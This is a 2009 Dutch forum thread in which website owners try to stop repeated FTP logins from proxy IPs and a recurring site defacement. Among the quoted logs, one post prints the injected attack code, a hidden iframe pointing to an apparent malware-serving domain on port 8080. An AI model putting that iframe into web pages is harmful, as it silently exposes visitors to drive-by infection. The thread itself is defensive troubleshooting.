Qwea | zondag 9 augustus 2009 @ 20:44 |
Ola! Vraagje ; Is het mogelijk om ip's de toegang te blocken? Dus dat bijvoorbeeld 123.43.454.11 niet mag inloggen/kan inloggen met dat IP. Beter nog ; is het mogelijk om te zeggen dat er bv maar 3 ip's mogen inloggen op de ftp server? En de rest dus gewoon niet. | |
ibaneX | zondag 9 augustus 2009 @ 20:45 |
Ja dit kan! | |
Qwea | zondag 9 augustus 2009 @ 20:47 |
quote:Nou, vertel maar hoe dan | |
Netsplitter | zondag 9 augustus 2009 @ 20:47 |
Ja, maar dat hangt ook helemaal af van de software die gebruikt wordt. | |
-_Tommy_- | zondag 9 augustus 2009 @ 20:48 |
welk programma gebruik je? dan moet je dat opstarten... op F1 drukken en dan zoeken naar IP access... | |
Elmostyle | zondag 9 augustus 2009 @ 20:48 |
ik neem aan dat je je webserver op Unix draait? wat voor firewall software gebruik je? | |
Qwea | zondag 9 augustus 2009 @ 20:49 |
quote:Op dit moment wordt dreamweaver gebruikt. | |
Netsplitter | zondag 9 augustus 2009 @ 20:49 |
quote:?? Je kan met dreamweaver geen ftp server draaien. ![]() | |
Qwea | zondag 9 augustus 2009 @ 20:51 |
quote: Ja, draait unix. Firewall software geen id.. het is geen eigen webserver maar van een host. Ik zal ook even gelijk wat duidelijker zijn. MM zn website is tot 2x toe nu gehackt. Het is geen password wat in een textbook voorkomt, dus hoe ze binnen komen mag god weten. Ze proberen een iframe in te laten laden die naar een site verwijst met ws een trojan horse ![]() En het zijn *kijkt in log* een stuk of 20 proxy ip's.. en als we die bannen, pakken ze andere... ik wil dus eigenlijk een soort van "mac filter" maar dan met ip adressen die dus mogen inloggen op de server ![]() | |
Qwea | zondag 9 augustus 2009 @ 20:51 |
quote:Ik dacht het ftp programma ![]() Unix wordt gedraait door de host | |
-_Tommy_- | zondag 9 augustus 2009 @ 20:53 |
aha, dan moet je dat regelen met de host! jij kan het waarschijnlijk niet aanpassen! of je moet je wachtwoord wat moeilijker maken! | |
Netsplitter | zondag 9 augustus 2009 @ 20:53 |
Creeer een firewall en laat die readonly draaien en elke 24 uur rebooten, dan kunnen ze elke keer weer opnieuw beginnen met hacken. ![]() | |
Elmostyle | zondag 9 augustus 2009 @ 20:54 |
quote:Als ze in je site een iframe kunnen aanroepen, zit er een fout in je PHP/ASP code. aangezien ze je variabelen wijzigen vanaf afstand. Of zie je in je FTP Access logs ook echt dat ze files aanpassen? Weet je wel dat je FTP Server wel up-to-date is? Verder heb je wel firewall software nodig wil je het blokkeren. aangezien je bij een simpele router meestal alleen een algemene blacklist hebt, en niet alleen voor specifieke poorten. | |
Qwea | zondag 9 augustus 2009 @ 20:54 |
quote:ww is net aangepast... maar het ww is geen ww wat je dmv een prog makkelijk kraakt. Maar er bestaat dus niet zoiets als een htaccess bestand hiervoor? | |
Qwea | zondag 9 augustus 2009 @ 20:55 |
quote:Stukje uit de root log die ik net van de host heb gehad ; Aug 9 20:31:13 s1 proftpd[26089]: s2.imtek.nl (::ffff:99.18.52.30[::ffff:99.18.52.30]) - Preparing to chroot to directory '/home/mmnl' Aug 9 20:31:22 s1 proftpd[26091]: s2.imtek.nl (::ffff:216.208.154.184[::ffff:216.208.154.184]) - Preparing to chroot to directory '/home/mmnl' Aug 9 20:31:29 s1 proftpd[26093]: s2.imtek.nl (::ffff:68.46.148.41[::ffff:68.46.148.41]) - Preparing to chroot to directory '/home/mmnl' Aug 9 20:31:37 s1 proftpd[26110]: s2.imtek.nl (::ffff:87.21.112.83[::ffff:87.21.112.83]) - Preparing to chroot to directory '/home/mmnl' En binnen 24u gewoon 825x inloggen ![]() Er wordt trouwens joomla als cms gedraait door MM, maar die is gisteren na de 1ste hack geupdate.. maar dat hielp dus blijkbaar niet. | |
Elmostyle | zondag 9 augustus 2009 @ 20:57 |
quote:Ze proberen in te loggen dmv SSH ipv FTP, daar is chrooten tenminste voor. Dus je zal ze op poort 22 moeten blocken ipv poort 21. Beschik je over een SSH account bij je hosting? anders zou je die evt. toch kunnen laten blokkeren indien je die toch niet gebruikt. Verder .htaccess helpt niet, dat is alleen voor acties op poort 80 | |
Qwea | zondag 9 augustus 2009 @ 20:59 |
quote:Qwea | No time for sleeping zegt (20:58): beschikt MM over een ssh account? dat vroegen ze zich in het topic op fok af:+ Imtek zegt (20:59): niet naar mijn weten Qwea | No time for sleeping zegt (20:59): okido Imtek zegt (20:59): [root@s1 ~]# cat /etc/passwd | grep mmnl mmnl:x:516:517::/home/mmnl:/bin/false nein | |
Elmostyle | zondag 9 augustus 2009 @ 21:07 |
quote:Laat je host hun firewall maar eens fatsoenlijk configureren, want daar zit dan zeker weten een fout in. | |
Qwea | zondag 9 augustus 2009 @ 21:09 |
quote: quote:Mijn host is nu weg ![]() Username wordt morgen ook aangepast. Ben benieuwd ![]() ![]() | |
Qwea | zondag 9 augustus 2009 @ 21:11 |
Trouwens, stukje uit de broncode van wat hun hebben aangepast ; <iframe src="http://zdlz.in:8080/index.php" width=173 height=148 style="visibility: hidden"></iframe> En op de 1 of andere manier doen ze denk ik ook iets niet goed, want elke x dat ze het aanpassen zit er een parse error op line 90. ![]() | |
Elmostyle | zondag 9 augustus 2009 @ 21:15 |
quote:hm vaag ![]() | |
Qwea | zondag 9 augustus 2009 @ 21:21 |
Hmm, nou dan gaat dat wachtwoord veranderen van MM ws ook niet helpen ![]() | |
Elmostyle | zondag 9 augustus 2009 @ 21:34 |
quote:wss niet nee ![]() | |
rihago | zondag 9 augustus 2009 @ 21:36 |
quote:weet niet waar jij ziet dat ze ssh toegang hebben hoor? hij kan niet eens inloggen via ssh | |
rihago | zondag 9 augustus 2009 @ 21:38 |
quote:voor even maar... daarna wordt deze weer gebrute forced... | |
rihago | zondag 9 augustus 2009 @ 21:38 |
quote:staat hier helemaal los van. | |
Riparius | zondag 9 augustus 2009 @ 21:52 |
quote:Je pakt het verkeerd aan. Als je een goed (sterk) wachtwoord gebruikt en je site wordt ook na een wijziging van het wachtwoord tóch weer gehackt, dan is dat een indicatie dat één of meer van de computers die je voor het updaten van je site gebruikt is besmet en je FTP wachtwoorden doorstuurt naar de hackers. Lees hier maar even hoe dat kan. Dát probleem (die besmetting van je PC) moet je dus eerst oplossen. | |
Qwea | zondag 9 augustus 2009 @ 22:05 |
quote:edit | |
MikeyMo | zondag 9 augustus 2009 @ 22:33 |
terugvindprobleem | |
Ezechielk | maandag 10 augustus 2009 @ 10:42 |
Goeie vraag, even volgen. Momenteel ben ik gelukkig nog vrij gebleven van dergelijke perikelen, maar wie weet wat me te wachten staat. Misschien off-topic, maar zitten jullie allemaal bij de zelfde host? | |
Qwea | maandag 10 augustus 2009 @ 11:12 |
quote:nee | |
rihago | maandag 10 augustus 2009 @ 17:44 |
quote:Nee, dat regel ik zelf.. |